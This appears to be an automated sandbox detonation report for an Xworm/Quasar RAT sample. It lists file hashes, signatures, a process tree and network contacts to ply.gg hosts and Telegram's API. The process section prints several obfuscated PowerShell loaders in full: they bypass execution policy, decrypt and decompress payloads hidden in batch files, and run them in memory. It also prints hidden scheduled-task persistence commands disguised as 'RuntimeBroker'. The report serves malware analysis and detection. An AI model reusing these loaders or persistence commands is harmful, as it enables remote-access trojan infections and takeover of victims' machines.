| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | eb15ee5741b379245ca8549cb0d4ecf8 |
| SHA1 | 3555273945abda3402674aea7a4bff65eb71a783 |
| SHA256 | b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636 |
| SHA512 | 1f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4 |
C:\Users\Admin\AppData\Roaming\startup_str_824.vbs
| MD5 | 3ffd611ef2d18d243ac564e0f7d62821 |
| SHA1 | dc263be524db27643cd508db6324a6fa84894ac7 |
| SHA256 | b3675ddb7a8616d21671bc2e69dac84890c104c802ba9132a89e0a523a8f1fae |
| SHA512 | 9ea8f1655bc51637279d62b86c0b863d233eb187a28fd1130736fe769327bbb51645046385c7fdc850954b5497f25e1794e947be2fc30464fb8307d579f60dce |
C:\Users\Admin\AppData\Roaming\startup_str_824.bat
| MD5 | 948386c98184781df692e5f11ff558f7 |
| SHA1 | e8619faf83446ea78e456920834579bbf71aea20 |
| SHA256 | 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f |
| SHA512 | 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba |
C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat
| MD5 | 795363cfbf5d3fca47edc4cbc247a1c0 |
| SHA1 | 9374d05486b0b62977825d07f748fa03cca3c864 |
| SHA256 | 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6 |
| SHA512 | c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94 |
C:\Users\Admin\AppData\Roaming\startup_str_490.vbs
| MD5 | 73e3c7287bdc5f01d99975b430648c50 |
| SHA1 | cc5c980a06300d17deb79d2ba171901fe572d19d |
| SHA256 | 90d9885fc42a71dd01bb1075c27c17440fd7c5477be9bcf0fdb11ab31b0129cc |
| SHA512 | 12f93c750af16e139b82dfa4a8026f51b79686e8c96a32df84e73f0db9184a88fdf4d6f278d79e055c05ba9e804b96a44bae28c9072ccf034d9f7be05f40a4c8 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-13 17:59
Reported
2024-04-13 18:01
Platform
win10-20240404-en
Max time kernel
38s
Max time network
52s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Double.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Double.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Double.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_306_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_306.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_306.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_306.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WNVJGr2TVEzMcvEJ3ibTnTRPHuqPgaJ3neGZEp/fx44='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4bA2EKopXpAd9WyBAjAcwg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VkPFT=New-Object System.IO.MemoryStream(,$param_var); $jRnYQ=New-Object System.IO.MemoryStream; $UnDGQ=New-Object System.IO.Compression.GZipStream($VkPFT, [IO.Compression.CompressionMode]::Decompress); $UnDGQ.CopyTo($jRnYQ); $UnDGQ.Dispose(); $VkPFT.Dispose(); $jRnYQ.Dispose(); $jRnYQ.ToArray();}function execute_function($param_var,$param2_var){ $bERJN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rGUDX=$bERJN.EntryPoint; $rGUDX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_306.bat';$TWUHB=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_306.bat').Split([Environment]::NewLine);foreach ($SAFER in $TWUHB) { if ($SAFER.StartsWith(':: ')) { $eDntu=$SAFER.Substring(3); break; }}$payloads_var=[string[]]$eDntu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_991_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_991.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4396" "2636" "2296" "2632" "0" "0" "2640" "0" "0" "0" "0" "0"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_991.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_991.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IY86fBBkCXWBMMgcQvXxIMJ+E8tHVhc++oVyZrSHY6U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PASGTQqG4m/1CfnhhohGIA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ceHAM=New-Object System.IO.MemoryStream(,$param_var); $bezvA=New-Object System.IO.MemoryStream; $chVIq=New-Object System.IO.Compression.GZipStream($ceHAM, [IO.Compression.CompressionMode]::Decompress); $chVIq.CopyTo($bezvA); $chVIq.Dispose(); $ceHAM.Dispose(); $bezvA.Dispose(); $bezvA.ToArray();}function execute_function($param_var,$param2_var){ $djkzD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $vXIdK=$djkzD.EntryPoint; $vXIdK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_991.bat';$OrYnu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_991.bat').Split([Environment]::NewLine);foreach ($pwKXX in $OrYnu) { if ($pwKXX.StartsWith(':: ')) { $PrdGw=$pwKXX.Substring(3); break; }}$payloads_var=[string[]]$PrdGw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | express-divorce.gl.at.ply.gg | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | traffic-collins.gl.at.ply.gg | udp |
| US | 147.185.221.19:24820 | traffic-collins.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qikc30dv.m3g.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bb4d79c418d1df838dc1dfb6db57501d |
| SHA1 | 903525e7a2dac8f931e1ba2f87e1bb1dea08a867 |
| SHA256 | f1bf5360d8ede0205136292027ecff131b04d6cfd7bbb9ab146472de948c771f |
| SHA512 | 43b3c6ae5facdd7c1d59ff23b5681919252900a7c9cf16270ae51e98372648d1b67323dd1f86745266acc751c0bd8f17e7400c903a02c8f7ca5c74e450c25eee |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Roaming\startup_str_306.vbs
| MD5 | dc4450363ab10c9f55eaf2d492874449 |
| SHA1 | e24646e2935bac1e28d52a61d6d66137c9456bdc |
| SHA256 | 66289b23354835c32537852ad0db8b3a1577e6ceb302260b9559fa18954d894e |
| SHA512 | 679080f157f9a10aa36aa0db4b005aaed74bdb6d2fdcbcfd37f236c42be5a4b2add257757bc6012ce0f77d16e7503bfb0bc57adf6714cc84d227cc5444179619 |
C:\Users\Admin\AppData\Roaming\startup_str_306.bat
| MD5 | 948386c98184781df692e5f11ff558f7 |
| SHA1 | e8619faf83446ea78e456920834579bbf71aea20 |
| SHA256 | 7da1336453539461c6b6630200259214c3fba0e458c21e15e26545c0816f6c7f |
| SHA512 | 0023368d89bf5951b3fc87e4ea8fb84e02a87c0917bd5aef0d5bcc00d5a9de616f4922956a015aa7f748299813876a290b545a309116878506c89de3387148ba |
C:\Users\Admin\AppData\Local\Temp\XClientNOT.bat
| MD5 | 795363cfbf5d3fca47edc4cbc247a1c0 |
| SHA1 | 9374d05486b0b62977825d07f748fa03cca3c864 |
| SHA256 | 84c422d2ccda03230c8eecda7daa2e4ffa00a89d862bed459be52875dde096b6 |
| SHA512 | c5f147e4d011342d3518416b0d5d30f5adc8eeadac2b060a94abdd80ef8452a61cca997831d69473a13b52ad7aa8acb2ddf507dd3f49f68dfddaf6cbd7c23c94 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4a19d2f0bbbfd0b860dd34dc7422b58b |
| SHA1 | 4334057c7d2792735d2461ffbcfa3c796f79e1c3 |
| SHA256 | 7edd03ffa0d38ffbc336e31b6b1f4bbdbad99605e79f473e37362867623ae259 |
| SHA512 | 018ee82f304d0f49e463cfd13bac9a2968ea543c82e7981334acf5506d2f8040eb689da8cd45b6c1ca08fa14ec47a43762525352aac33d4863bccd33fad3827e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6c59ae289c6cd378ba3c32219b44ae24 |
| SHA1 | eb064e026f4ea176716ed4ec2ede9e66f196d2aa |
| SHA256 | fdc6f52488f057437990155aba3dd308b7ed4faee73fe7cf9d21e53b8a952cd6 |
| SHA512 | e80b7deeef7a5fe16b6aef7a894c45da1ccc79d8a5360b36a664a2a36867be3f0350a06458629f8d0e7671b4b0e0d2050efbc0cde61e068cb60a6719fb67dadc |
C:\Users\Admin\AppData\Roaming\startup_str_991.vbs
| MD5 | 31ad013b3aa57b3fbb6cb1e560d05fe7 |
| SHA1 | fd7e96db28efd6baed7cd97e90dadb8f58b0c162 |
| SHA256 | fff219810b246a986ec84d671e01e2cf55a95c27fdfae873f8eba20cd24a5dfb |
| SHA512 | f1c95d6ac70f5bd862fd48a2e47036e48f80e7b0bf650856e4d8d8f5491d06af5364e98dd1bca50fda9a424e161c440193b312e748f0dd2fdd553f28743d1c28 |